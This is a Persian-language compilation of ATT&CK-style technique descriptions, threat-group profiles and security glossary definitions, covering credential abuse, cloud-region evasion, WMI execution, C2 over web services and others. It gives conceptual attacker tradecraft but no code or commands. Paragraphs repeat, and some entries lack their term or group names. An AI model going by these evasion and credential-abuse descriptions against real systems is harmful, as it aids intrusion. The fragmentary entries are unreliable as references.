دشمنان ممکن است از مواد احراز هویت جایگزین مانند درهم‌سازی رمز عبور، بلیط‌های Kerberos و نشانه‌های دسترسی برنامه‌ها برای حرکت جانبی در یک محیط و دور زدن کنترل‌های دسترسی عادی سیستم استفاده کنند. فرآیندهای احراز هویت عموماً به یک هویت معتبر (به عنوان مثال، نام کاربری) به همراه یک یا چند عامل احراز هویت (مانند رمز عبور، پین، کارت هوشمند فیزیکی، تولید کننده رمز و غیره) نیاز دارند. پس از اینکه کاربر یا برنامه کاربردی با ارائه یک هویت معتبر و فاکتور(های) احراز هویت مورد نیاز، احراز هویت را با موفقیت انجام داد، مواد احراز هویت جایگزین به طور قانونی توسط سیستم ها تولید می شود. مواد احراز هویت جایگزین نیز ممکن است در طول فرآیند ایجاد هویت تولید شود. ذخیره سازی مواد احراز هویت جایگزین به سیستم اجازه می دهد تا بدون درخواست از کاربر برای وارد کردن مجدد فاکتور(های) احراز هویت، تأیید کند که هویت با موفقیت تأیید شده است. از آنجا که احراز هویت جایگزین باید توسط سیستم حفظ شود - چه در حافظه یا روی دیسک - ممکن است از طریق تکنیک‌های Credential Access در معرض خطر سرقت قرار گیرد. با سرقت مواد احراز هویت جایگزین، دشمنان می‌توانند کنترل‌های دسترسی سیستم را دور بزنند و بدون دانستن رمز عبور متن ساده یا هر عامل دیگر احراز هویت، به سیستم‌ها احراز هویت کنند.

دشمنان ممکن است نمونه های ابری را در مناطق خدمات جغرافیایی استفاده نشده ایجاد کنند تا از شناسایی فرار کنند. دسترسی معمولاً از طریق حساب‌های مخربی که برای مدیریت زیرساخت‌های ابری استفاده می‌شوند به دست می‌آید. ارائه‌دهندگان خدمات ابری اغلب زیرساخت‌هایی را در سرتاسر جهان به منظور بهبود عملکرد، ارائه افزونگی و اجازه دادن به مشتریان برای برآورده کردن الزامات انطباق ارائه می‌کنند. اغلب اوقات، یک مشتری فقط از زیر مجموعه ای از مناطق موجود استفاده می کند و ممکن است به طور فعال مناطق دیگر را نظارت نکند. اگر حریف منابعی را در یک منطقه استفاده نشده ایجاد کند، ممکن است بتواند بدون شناسایی عمل کند. یک تغییر در این رفتار از تفاوت در عملکرد در مناطق ابری استفاده می کند. یک دشمن می تواند از مناطقی استفاده کند که از خدمات تشخیص پیشرفته پشتیبانی نمی کنند تا از شناسایی فعالیت آنها جلوگیری کند. نمونه ای از استفاده دشمن از مناطق استفاده نشده AWS استخراج ارز دیجیتال از طریق Resource Hijacking است که می تواند هزینه های قابل توجهی را در طول زمان برای سازمان ها و بسته به قدرت پردازشی مورد استفاده به همراه داشته باشد.

دشمنان ممکن است از مواد احراز هویت جایگزین، مانند درهم‌سازی رمز عبور، بلیط‌های Kerberos، و نشانه‌های دسترسی برنامه‌ها برای حرکت جانبی در یک محیط و دور زدن کنترل‌های دسترسی عادی سیستم استفاده کنند. فرآیندهای احراز هویت عموماً به یک هویت معتبر (به عنوان مثال، نام کاربری) به همراه یک یا چند عامل احراز هویت (مانند رمز عبور، پین، کارت هوشمند فیزیکی، تولید کننده رمز و غیره) نیاز دارند. پس از اینکه کاربر یا برنامه کاربردی با ارائه یک هویت معتبر و فاکتور(های) احراز هویت مورد نیاز احراز هویت را تأیید کرد، مواد احراز هویت جایگزین به طور قانونی توسط سیستم ها تولید می شود. مواد احراز هویت جایگزین نیز ممکن است در طول فرآیند ایجاد هویت تولید شود.ذخیره سازی مواد احراز هویت جایگزین به سیستم اجازه می دهد تا بدون درخواست از کاربر برای وارد کردن مجدد فاکتور(های) احراز هویت، تأیید کند که هویت با موفقیت تأیید شده است. از آنجا که احراز هویت جایگزین باید توسط سیستم حفظ شود - چه در حافظه یا روی دیسک - ممکن است از طریق تکنیک‌های Credential Access در معرض خطر سرقت قرار گیرد. با سرقت مواد احراز هویت جایگزین، دشمنان می‌توانند کنترل‌های دسترسی سیستم را دور بزنند و بدون دانستن رمز عبور متن ساده یا هر عامل دیگر احراز هویت به سیستم‌ها احراز هویت کنند.

آسیب‌پذیری یک حفره یا ضعف در برنامه است، که می‌تواند یک نقص در طراحی یا یک اشکال در اجرا باشد، که به مهاجم اجازه می‌دهد تا به ذینفعان یک برنامه آسیب برساند. ذینفعان شامل مالک برنامه، کاربران برنامه و سایر نهادهایی هستند که به برنامه متکی هستند.

دشمنان ممکن است قربانیان را برای آسیب‌پذیری‌هایی که می‌توانند در هنگام هدف‌گیری استفاده شوند، اسکن کنند. اسکن‌های آسیب‌پذیری معمولاً بررسی می‌کنند که آیا پیکربندی میزبان/ برنامه مورد نظر (مانند نرم افزار و نسخه) به طور بالقوه با هدف سوء استفاده خاصی مطابقت دارد که دشمن می‌خواهد از آن استفاده کند.این اسکن‌ها همچنین ممکن است شامل تلاش‌های گسترده‌تری برای جمع‌آوری اطلاعات میزبان قربانی باشد که می‌تواند برای شناسایی آسیب‌پذیری‌های شناخته شده و قابل استفاده بیشتر مورد استفاده قرار گیرد. اسکن‌های آسیب‌پذیری معمولاً نرم افزارهای در حال اجرا و شماره‌های نسخه را از طریق بنرهای سرور یا دیگر مصنوعات شبکه جمع‌آوری می‌کند. اطلاعات حاصل از این اسکن‌ها ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها / دامنه‌های باز یا جستجو در پایگاه‌های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها)

دشمنان ممکن است اعتبار حساب‌های موجود را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. اعتبارنامه‌های در معرض خطر ممکن است برای دور زدن کنترل‌های دسترسی قرار گرفته بر روی منابع مختلف در سیستم‌های درون شبکه استفاده شوند و حتی ممکن است برای دسترسی دائمی به سیستم‌های راه دور و سرویس‌های موجود خارجی، مانند VPN، Outlook Web Access و دسک‌تاپ راه دور استفاده شوند. اعتبارنامه‌های به خطر افتاده همچنین ممکن است به یک دشمن امتیاز بیشتری را برای سیستم های خاص یا دسترسی به مناطق محدود شبکه اعطا کند. دشمنان ممکن است تصمیم بگیرند که از بدافزار یا ابزار در ارتباط با دسترسی قانونی آن اعتبارنامه ها استفاده نکنند تا تشخیص حضور آنها دشوارتر شود. همپوشانی مجوزها برای حساب‌های محلی، دامنه و ابری در سراسر شبکه‌ای از سیستم‌ها نگران‌کننده است، زیرا ممکن است دشمن بتواند در میان حساب‌ها و سیستم‌ها حرکت کند تا به سطح بالایی از دسترسی (یعنی مدیر دامنه یا سازمانی) برای دور زدن کنترل های تعیین شده در شرکت برسد.

دشمنان ممکن است اعتبار یک حساب پیش فرض را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های پیش‌فرض آنهایی هستند که در یک سیستم‌عامل داخلی هستند، مانند حساب‌هایGuestیاAdministratorدر سیستم‌های ویندوز. حساب‌های پیش‌فرض همچنین شامل حساب‌های پیش‌فرض مجموعه کارخانه/ ارائه‌دهنده در انواع دیگر سیستم‌ها، نرم‌افزارها یا دستگاه‌ها، از جمله حساب کاربری ریشه در AWS و حساب سرویس پیش‌فرض در Kubernetes هستند. حساب‌های پیش‌فرض به ماشین‌های مشتری محدود نمی‌شوند، بلکه شامل حساب‌هایی می‌شوند که برای تجهیزاتی مانند دستگاه‌های شبکه و برنامه‌های رایانه‌ای از پیش تنظیم شده‌اند، خواه داخلی، منبع باز یا تجاری باشند. وسایلی که از پیش تنظیم شده با نام کاربری و رمز عبور ترکیب می شوند، تهدیدی جدی برای سازمان هایی هستند که پس از نصب آن را تغییر نمی دهند، زیرا آنها اهداف آسانی برای یک دشمن هستند. به طور مشابه، دشمنان همچنین ممکن است از کلیدهای خصوصی افشا شده یا سرقت شده عمومی یا مواد اعتباری برای اتصال قانونی به محیط های راه دور از طریق خدمات از راه دور استفاده کنند.

دشمنان ممکن است اعتبار یک حساب دامنه را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های دامنه آنهایی هستند که توسط Active Directory Domain Services مدیریت می‌شوند که دسترسی و مجوزها در سیستم‌ها و سرویس‌هایی که بخشی از آن دامنه هستند پیکربندی می‌شوند. حساب‌های دامنه می‌توانند کاربران، سرپرستان و خدمات را پوشش دهند. دشمنان ممکن است حساب‌های دامنه را که برخی از آنها دارای سطح بالایی از امتیازات هستند، از طریق روش‌های مختلف مانند حذف اعتبار سیستم‌عامل یا استفاده مجدد از رمز عبور، به خطر بیاندازند که امکان دسترسی به منابع ممتاز دامنه را فراهم می‌کند.

دشمنان ممکن است اعتبار یک حساب محلی را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های محلی آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور یا برای مدیریت در یک سیستم یا سرویس واحد پیکربندی شده‌اند. همچنین ممکن است از حساب‌های محلی برای بالا بردن امتیازات و جمع‌آوری اعتبار از طریق تخلیه اعتبار سیستم‌عامل سوء استفاده شود.

دشمنان ممکن است اعتبار یک حساب ابری را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های ابری آنهایی هستند که توسط یک سازمان برای استفاده کاربران، پشتیبانی از راه دور، خدمات یا مدیریت منابع در یک ارائه‌دهنده خدمات ابری یا برنامه SaaS ایجاد و پیکربندی شده‌اند. در برخی موارد، حساب‌های ابری ممکن است با سیستم مدیریت هویت سنتی، مانند Window Active Directory، فدرال شوند. اعتبار به خطر افتاده برای حساب های ابری می تواند برای جمع آوری داده های حساس از حساب های ذخیره سازی آنلاین و پایگاه های داده استفاده شود. همچنین می‌توان از دسترسی به حساب‌های ابری برای به دست آوردن دسترسی اولیه به یک شبکه با سوء استفاده از یک رابطه معتمد سوء استفاده کرد. مشابه حساب‌های دامنه، به خطر افتادن حساب‌های ابری فدرال ممکن است به دشمنان اجازه دهد راحت‌تر در یک محیط حرکت کنند.

دشمنان ممکن است اعتبار حساب‌های موجود را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. اعتبارنامه های در معرض خطر ممکن است برای دور زدن کنترل های دسترسی قرار داده شده بر روی منابع مختلف در سیستم های درون شبکه استفاده شوند و حتی ممکن است برای دسترسی دائمی به سیستم های راه دور و سرویس های موجود خارجی، مانند VPN ها، Outlook Web Access و دسکتاپ راه دور استفاده شوند. اعتبار به خطر افتاده همچنین ممکن است به یک حریف امتیاز بیشتری برای سیستم های خاص یا دسترسی به مناطق محدود شبکه بدهد. دشمنان ممکن است ترجیح دهند از بدافزار یا ابزارها در ارتباط با دسترسی قانونی آن اعتبارنامه ها استفاده نکنند تا تشخیص حضور آنها دشوارتر شود. همپوشانی مجوزها برای حساب‌های محلی، دامنه و ابری در سراسر شبکه‌ای از سیستم‌ها نگران‌کننده است، زیرا ممکن است دشمن بتواند بین حساب‌ها و سیستم‌ها چرخش کند تا به سطح بالایی از دسترسی (یعنی مدیر دامنه یا سازمانی) برای دور زدن دسترسی برسد. کنترل های تعیین شده در شرکت.

دشمنان ممکن است اعتبار یک حساب پیش‌فرض را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، پایداری، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های پیش‌فرض آنهایی هستند که در یک سیستم‌عامل داخلی هستند، مانند حساب‌هایGuest یا Administrator در سیستم‌های ویندوز. حساب‌های پیش‌فرض همچنین شامل حساب‌های مجموعه پیش‌فرض کارخانه ارائه‌دهنده در انواع دیگر سیستم‌ها، نرم‌افزارها یا دستگاه‌ها، از جمله حساب کاربری ریشه در AWS و حساب سرویس پیش‌فرض در Kubernetes هستند. حساب‌های پیش‌فرض به ماشین‌های مشتری محدود نمی‌شوند، بلکه شامل حساب‌هایی می‌شوند که برای تجهیزاتی مانند دستگاه‌های شبکه و برنامه‌های رایانه‌ای از پیش تنظیم شده‌اند، خواه داخلی، منبع باز یا تجاری باشند. وسایلی که از پیش تعیین شده با نام کاربری و رمز عبور ترکیب می شوند، تهدیدی جدی برای سازمان هایی هستند که پس از نصب آن را تغییر نمی دهند، زیرا آنها اهداف آسانی برای یک دشمن هستند. به طور مشابه، دشمنان همچنین ممکن است از کلیدهای خصوصی افشا شده یا دزدیده شده عمومی یا مواد اعتباری برای اتصال قانونی به محیط های راه دور از طریق خدمات از راه دور استفاده کنند.

دشمنان ممکن است اعتبار یک حساب دامنه را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های دامنه آنهایی هستند که توسط Active Directory Domain Services مدیریت می‌شوند که دسترسی و مجوزها در سیستم‌ها و سرویس‌هایی که بخشی از آن دامنه هستند پیکربندی می‌شوند. حساب‌های دامنه می‌توانند کاربران، سرپرستان و خدمات را پوشش دهند. دشمنان ممکن است حساب‌های دامنه را که برخی از آنها دارای سطح بالایی از امتیازات هستند، از طریق روش‌های مختلفی مانند حذف اعتبار سیستم‌عامل یا استفاده مجدد از رمز عبور، به خطر بیاندازند که امکان دسترسی به منابع ممتاز دامنه را فراهم می‌کند.

دشمنان ممکن است اعتبار یک حساب محلی را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های محلی آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور، خدمات یا برای مدیریت در یک سیستم یا سرویس واحد پیکربندی شده‌اند. همچنین ممکن است از حساب‌های محلی برای افزایش امتیازات و جمع‌آوری اعتبارنامه‌ها از طریق تخلیه اعتبار سیستم عامل سوء استفاده شود. استفاده مجدد از گذرواژه ممکن است اجازه سوء استفاده از حساب‌های محلی را در مجموعه‌ای از ماشین‌های موجود در شبکه برای اهداف افزایش امتیاز و حرکت جانبی بدهد.

دشمنان ممکن است اعتبار یک حساب ابری را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های ابری آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور، خدمات یا برای مدیریت منابع در یک ارائه‌دهنده خدمات ابری یا برنامه SaaS ایجاد و پیکربندی شده‌اند. در برخی موارد، حساب‌های ابری ممکن است با سیستم مدیریت هویت سنتی، مانند Window Active Directory، فدرال شوند. اعتبار به خطر افتاده برای حساب های ابری می تواند برای جمع آوری داده های حساس از حساب های ذخیره سازی آنلاین و پایگاه های داده استفاده شود. همچنین می‌توان از دسترسی به حساب‌های ابری برای به دست آوردن دسترسی اولیه به یک شبکه با سوء استفاده از یک رابطه معتمد سوء استفاده کرد. مشابه حساب‌های دامنه، به خطر افتادن حساب‌های ابری فدرال ممکن است به دشمنان اجازه دهد راحت‌تر در یک محیط حرکت کنند.

دشمن می‌تواند از دستگاه‌های جانبی رایانه (مانند دوربین‌های یکپارچه یا وب‌کم) یا برنامه‌های کاربردی (مانند خدمات تماس ویدیویی) برای ضبط ویدیوهای ضبط‌شده به منظور جمع‌آوری اطلاعات استفاده کند. همچنین ممکن است به جای فایل‌های ویدیویی، از دستگاه‌ها یا برنامه‌ها، در فواصل زمانی مشخص، تصاویر گرفته شود. بدافزارها یا اسکریپت‌ها ممکن است برای تعامل با دستگاه‌ها از طریق یک API موجود ارائه شده توسط سیستم عامل یا برنامه‌ای برای ضبط ویدیو یا تصاویر استفاده شوند. فایل‌های ویدیویی یا تصویری ممکن است روی دیسک نوشته شده و بعداً استخراج شوند. این تکنیک با Screen Capture به دلیل استفاده از دستگاه ها یا برنامه های خاص برای ضبط ویدیو به جای گرفتن صفحه قربانی متفاوت است. در macOS، چند نمونه بدافزار مختلف وجود دارد که وب‌کم کاربر مانند FruitFly و Proton را ضبط می‌کند.

Volatile Cedar یک گروه تهدید لبنانی است که افراد، شرکت ها و مؤسسات را در سراسر جهان هدف قرار داده است. Volatile Cedar از سال 2012 فعالیت می کند و انگیزه آن منافع سیاسی و ایدئولوژیک است.

دشمنان ممکن است از ابزار مدیریت ویندوز (WMI) برای اجرای دستورات و بارهای مخرب سوء استفاده کنند. WMI یک ویژگی مدیریتی است که محیطی یکنواخت برای دسترسی به اجزای سیستم ویندوز فراهم می‌کند. سرویس WMI هم دسترسی محلی و هم از راه دور را امکان‌پذیر می‌سازد، اگرچه دومی توسط سرویس‌های از راه دور مانند مدل شیء مؤلفه توزیع‌شده (DCOM) و مدیریت از راه دور ویندوز (WinRM) تسهیل می‌شود. WMI از راه دور روی DCOM با استفاده از پورت 135 کار می‌کند، در حالی که WMIروی WinRMروی پورت 5985 هنگام استفاده از HTTP و 5986 برای HTTPS عمل می کند. حریف می تواند از WMI برای تعامل با سیستم‌های محلی و راه دور استفاده کند و از آن به عنوان وسیله‌ای برای اجرای رفتارهای مختلف مانند جمع‌آوری اطلاعات برای Discovery و همچنین اجرای از راه دور فایل‌ها به عنوان بخشی از Lateral Movement استفاده کند.

دشمنان ممکن است از یک سرویس وب خارجی موجود و قانونی به عنوان وسیله ای برای انتقال داده ها به/از یک سیستم در معرض خطر استفاده کنند. وب‌سایت‌ها و رسانه‌های اجتماعی محبوب که به عنوان مکانیزمی برای C2 عمل می‌کنند، ممکن است به دلیل احتمال اینکه میزبان‌های داخل یک شبکه از قبل با آن‌ها در ارتباط هستند، قبل از مصالحه، پوشش قابل توجهی ارائه دهند. استفاده از سرویس‌های رایج، مانند سرویس‌هایی که توسط گوگل یا توییتر ارائه می‌شود، مخفی شدن در نویز مورد انتظار را برای دشمنان آسان‌تر می‌کند. ارائه دهندگان خدمات وب معمولاً از رمزگذاری SSL/TLS استفاده می کنند که به دشمنان سطح محافظت بیشتری می دهد. استفاده از سرویس‌های وب همچنین ممکن است از زیرساخت‌های C2پشتیبان در برابر کشف از طریق تجزیه و تحلیل باینری بدافزار محافظت کند و در عین حال انعطاف‌پذیری عملیاتی را نیز ممکن می‌سازد (زیرا این زیرساخت ممکن است به صورت پویا تغییر کند).

دشمنان ممکن است قابلیت رمزگذاری دستگاه شبکه را به خطر بیاندازند تا از رمزگذاری عبور کنند که در غیر این صورت از ارتباطات داده محافظت می کند. از رمزگذاری می توان برای محافظت از ترافیک شبکه انتقال یافته برای حفظ محرمانه بودن (محافظت در برابر افشای غیرمجاز) و یکپارچگی (محافظت در برابر تغییرات غیرمجاز) استفاده کرد. رمزهای رمزگذاری برای تبدیل یک پیام متنی ساده به متن رمزی استفاده می‌شوند و می‌توانند از نظر محاسباتی برای رمزگشایی بدون کلید رمزگشایی مرتبط، فشرده باشند. به طور معمول، کلیدهای طولانی تر، هزینه های رمزگشایی یا رمزگشایی بدون کلید را افزایش می دهند.دشمنان می توانند دستگاه هایی را که ترافیک شبکه را رمزگذاری می کنند به خطر بیاندازند و دستکاری کنند. به عنوان مثال، از طریق رفتارهایی مانند اصلاح تصویر سیستم، کاهش فضای کلید، و غیرفعال کردن سخت افزار کریپتو، یک دشمن می تواند تأثیر منفی داشته باشد و/یا توانایی دستگاه را برای رمزگذاری ایمن ترافیک شبکه از بین ببرد. این امر خطر بیشتری برای افشای غیرمجاز دارد و ممکن است به تسهیل دستکاری داده ها، دسترسی به اعتبار یا تلاش های جمع آوری کمک کند.

Whitefly یک گروه جاسوسی سایبری است که حداقل از سال 2017 فعالیت می‌کند. این گروه سازمان‌هایی را که عمدتاً در سنگاپور مستقر هستند در طیف گسترده‌ای از بخش‌ها هدف قرار داده است و در درجه اول به سرقت مقادیر زیادی از اطلاعات حساس علاقه دارد. این گروه با حمله ای علیه بزرگترین سازمان بهداشت عمومی سنگاپور، SingHealth مرتبط است.

گروه Windigo حداقل از سال 2011 فعالیت می کند و هزاران سرور لینوکس و یونیکس را با استفاده از درپشتی Ebury SSH برای ایجاد یک بات نت اسپم به خطر انداخته است. علیرغم مداخله مجری قانون علیه سازندگان، اپراتورهای Windigo به به‌روزرسانی Ebury تا سال 2019 ادامه دادند.

Windshift یک گروه تهدید است که حداقل از سال 2017 فعال بوده است و افراد خاصی را برای نظارت در ادارات دولتی و زیرساخت های حیاتی در سراسر خاورمیانه هدف قرار می دهد.

گروه Winnti یک گروه تهدید با منشاء چینی است که حداقل از سال 2010 فعال بوده است. این گروه به شدت صنعت بازی را هدف قرار داده است، اما دامنه هدف گذاری خود را نیز گسترش داده است. برخی گزارش‌ها نشان می‌دهند که تعدادی از گروه‌های دیگر، از جمله Axiom، , ، و ارتباط نزدیکی با Winnti Group دارند.

WRITE یک گروه تهدید است که حداقل از اوت 2018 فعال بوده است. تمرکز این گروه بر هدف قرار دادن دفاع و دیپلمات های خاورمیانه است.

یک گروه تهدید با انگیزه مالی مستقر در روسیه است که در اصل برای ایجاد و استقرار TrickBot از حداقل سال 2016 شناخته شده است. Wizard Spider دارای زرادخانه متنوعی از ابزارها است و کمپین های باج افزاری را علیه سازمان های مختلف انجام داده است، از شرکت های بزرگ گرفته تا بیمارستان ها.

ZIRCONIUM یک گروه تهدید در خارج از چین است که حداقل از سال 2017 فعال است و افراد مرتبط با انتخابات ریاست جمهوری 2020 ایالات متحده و رهبران برجسته جامعه بین المللی را هدف قرار داده است.

دسته ای از مسائل امنیتی-نرم افزاری-ضعف-که در آن محققین مستقل یک نقص نرم افزاری را قبل از کشف آن توسط صاحبان کد کشف می کنند. محققان باج افزارهایی را مشاهده کرده اند که قبلاً از سوء استفاده های روز صفر استفاده می کردند. اما نادر است

رویکردی به امنیت که فرض می‌کند دشمنان قبلاً به محیط دیجیتال نفوذ کرده‌اند و تلاش می‌کند با محدود کردن دسترسی افراد، دستگاه‌ها و نرم‌افزارها به منابع ضروری برای انجام عملکردشان و نه بیشتر، تأثیر بالقوه را کاهش دهد.

یک حمله سایبری که از یک آسیب پذیری روز صفر سوء استفاده می کند.

یک بدافزار ناشناخته که هیچ امضای شناسایی برای آن در دسترس نیست.

این تهدیدها در حملات خود کند و مداوم هستند. آنها به یک شبکه هدفمند نفوذ کرده و خاموش می‌مانند و منتظر زمان مناسب برای ایجاد ویرانی هستند.

نوعی حمله شبکه است که چندین روش فرار مختلف شناخته شده را ترکیب می‌کند تا یک تکنیک جدید ایجاد کند که به طور همزمان در چندین لایه از شبکه ارائه می‌شود. کد موجود در AET لزوماً مخرب نیست. خطر این است که دسترسی غیرقابل تشخیص به مهاجم را برای شبکه فراهم می‌کند.

APT ها به طور خاص حملات هدفمندی هستند که به سطح بالایی از برنامه ریزی و پنهان کاری در طول یک تعهد طولانی مدت نیاز دارند. APT ها می توانند برای هفته ها یا حتی ماه ها ناشناخته بمانند زیرا به طور نامرئی داده ها را از یک سازمان خارج می‌کنند. AET ها به خودی خود یک حمله نیستند، بلکه برای پوشاندن یک APT بسیار بزرگتر استفاده می شوند.

این مدل تعیین جنبه‌های اصلی و کلیدی پروتکل‌های قبل از خودش و همچنین ایده‌هایی از جرم شناسی سنتی به ویژه پروتکل مربوط به جستجوی صحنه جرم فیزیکی FBI است.

کنترل امنیت برنامه کاربردی یک عمل امنیتی است که برنامه‌های غیرمجاز را از راه‌هایی که داده‌ها را در معرض خطر قرار می‌دهد، مسدود یا محدود می‌کند. کنترل برنامه شامل بررسی کامل بودن و اعتبار، شناسایی، احراز هویت، مجوز، کنترل‌های ورودی و سایر موارد است.

فرایند مدیریت امنیت برنامه کاربردی به تیم پروژه کمک می‌کند تا بخش‌های مربوط به ONF را در یک پروژه کاربردی خاص اعمال کرده و شواهد نتایج را به طور رسمی در یک چارچوب نرم افزاری برنامه ثبت کند.

یک برنامه رایانه‌ای است که برای جلوگیری، شناسایی و حذف بدافزارها استفاده می‌شود.

رابط برنامه نویسی برنامه ارتباط بین رایانه‌ها یا بین برنامه‌های رایانه‌ای است. این یک نوع رابط نرم افزاری است که به سایر نرم افزارها خدمات ارائه می‌دهد. سند یا استانداردی که نحوه ایجاد یا استفاده از چنین اتصال یا رابطی را توصیف می‌کند.

یک کنسرسیوم بین المللی است که مشاغل آسیب‌دیده از حملات فیشینگ را با شرکت‌های امنیتی، مجریان قانون، دولت، انجمن‌های تجاری و دیگران گرد هم می‌آورد.

گروهی از متخصصان آنتی ویروس و امنیتی که اطلاعات مربوط به شرکت‌های AV ، محصولات، بدافزارها و سایر تهدیدها را به اشتراک می‌گذارند.

فرایند A&A یک ارزیابی جامع و یا ارزیابی سیاست‌های سیستم اطلاعات، اجزای امنیتی فنی و غیر فنی، اسناد، ضمانت‌های تکمیلی، خط مشی‌ها و آسیب‌پذیری‌ها است.

احراز هویت، مجوز و حسابداری اصطلاحی است برای چارچوب کنترل هوشمند دسترسی به منابع رایانه، اعمال سیاست‌ها، حسابرسی استفاده و ارائه اطلاعات لازم برای صورتحساب خدمات. این فرایندهای ترکیبی برای مدیریت و امنیت موثر شبکه مهم تلقی می‌شوند.

هر رشته‌ای که به عنوان بخشی از درخواست رمزگذاری یا رمزگشایی به سرویس مدیریت کلید Cloud منتقل می‌شود. AAD به عنوان یک بررسی یکپارچگی مورد استفاده قرار می‌گیرد و می‌تواند از داده‌ها در برابر حملات اشتباه محافظت کند.

ویژگی اقتدار (که به عنوان فروشگاه ویژگی نیز شناخته می‌شود) یک فهرست یا پایگاه داده است که سیستم‌ها می‌توانند به طور ایمن ویژگی‌ها را اضافه، اصلاح و ذخیره کنند.

سطوح اطمینان از احراز هویت به منظور ایجاد اطمینان در تأیید اعتبار ارائه شده توسط ارائه دهنده هویت به یک طرف متکی در سطح اطمینان دلخواه است و سطوح اطمینان از احراز هویت یک عامل در ارزیابی ریسک است.

احراز هویت تأیید می‌کند که کاربران همانطور که می‌گویند هستند. مجوز به آن کاربران اجازه دسترسی به یک منبع را می‌دهد. در حالی که احراز هویت و مجوز ممکن است شبیه به نظر برسند، اما فرآیندهای امنیتی متمایزی در دنیای هویت و مدیریت دسترسی هستند.

ویژگی مبتنی بر کنترل دسترسی که به عنوان کنترل دسترسی مبتنی بر خط مشی نیز شناخته می‌شود، یک الگوی کنترل دسترسی را تعریف می‌کند که به موجب آن حقوق دسترسی با استفاده از خط مشی‌هایی که ویژگی‌ها را با هم ترکیب می‌کند، به کاربران اعطا می‌شود. خط مشی‌ها می‌توانند از هر نوع ویژگی (ویژگی‌های کاربر، ویژگی‌های منبع، شی، ویژگی‌های محیط و غیره) استفاده کنند.

کنترل دسترسی یک تکنیک امنیتی است که تعیین می‌کند چه کسی یا چه چیزی می‌تواند منابع را در محیط محاسبات مشاهده یا استفاده کند. این یک مفهوم اساسی در امنیت است که خطر را برای تجارت یا سازمان به حداقل می‌رساند. دو نوع کنترل دسترسی وجود دارد: فیزیکی و منطقی. کنترل دسترسی فیزیکی دسترسی به پردیس‌ها، ساختمان‌ها، اتاق‌ها و دارایی‌های فیزیکی فناوری اطلاعات را محدود می‌کند. کنترل دسترسی منطقی اتصال به شبکه‌های کامپیوتری‌، فایل‌های سیستم و داده‌ها را محدود می‌کند.

مرکز کنترل مدیریت طوری طراحی شده است که به مدیر سیستم کاربر نهایی شما امکان مدیریت استفاده از نرم‌افزار مجاز شما توسط اعضای سازمان را بدهد. مدیر مجبور نیست برای مدیریت مجوزهای نرم افزار در سایت کاربر نهایی شما حضور فیزیکی داشته باشد.

در امنیت رایانه، اجرای کد دلخواه ( ACE) توانایی مهاجم برای اجرای هرگونه دستور یا کد دلخواه مهاجم بر روی ماشین هدف یا در یک فرآیند هدف است. آسیب‌پذیری اجرای کد دلخواه یک نقص امنیتی در نرم افزار یا سخت‌افزار است که اجازه اجرای دلخواه کد را می‌دهد.

نوعی حمله شبکه است که چندین روش فرار مختلف شناخته شده را ترکیب می‌کند تا یک تکنیک جدید ایجاد کند که به طور همزمان در چندین لایه از شبکه ارائه می‌شود. کد موجود در AET لزوماً مخرب نیست. خطر این است که دسترسی غیرقابل تشخیص به مهاجم را برای شبکه فراهم می‌کند.

APT-C-36یک گروه مشکوک جاسوسی آمریکای جنوبی است که حداقل از سال 2018 فعال بوده است. این گروه عمدتاً مؤسسات دولتی کلمبیا و همچنین شرکت های مهم در بخش مالی، صنعت نفت و تولید حرفه ای را هدف قرار می دهد.

APT1 یک گروه تهدید چینی است که به دپارتمان سوم اداره ستاد کل ارتش آزادیبخش خلق ( PLA) منسوب است، که معمولاً توسط واحد نظامی Cover Designator (MUCD) به عنوان واحد 61398 شناخته می شود.

APT12یک گروه تهدید است که به چین نسبت داده شده است. این گروه قربانیان مختلفی از جمله اما نه محدود به رسانه ها، شرکت های فناوری پیشرفته و چندین دولت را هدف قرار داده است.

APT16یک گروه تهدید مستقر در چین است که کمپین های spearphishing را با هدف قرار دادن سازمان‌های ژاپنی و تایوانی راه اندازی کرده است.

APT17یک گروه تهدید مستقر در چین است که نفوذهای شبکه ای را علیه نهادهای دولتی ایالات متحده، صنایع دفاعی، شرکت های حقوقی، شرکت های فناوری اطلاعات، شرکت های معدنی و سازمان های غیردولتی انجام داده است.

APT18یک گروه تهدید است که حداقل از سال 2009 فعالیت می کند و طیف وسیعی از صنایع از جمله فناوری، تولید، گروه های حقوق بشر، دولت و پزشکی را هدف قرار داده است.

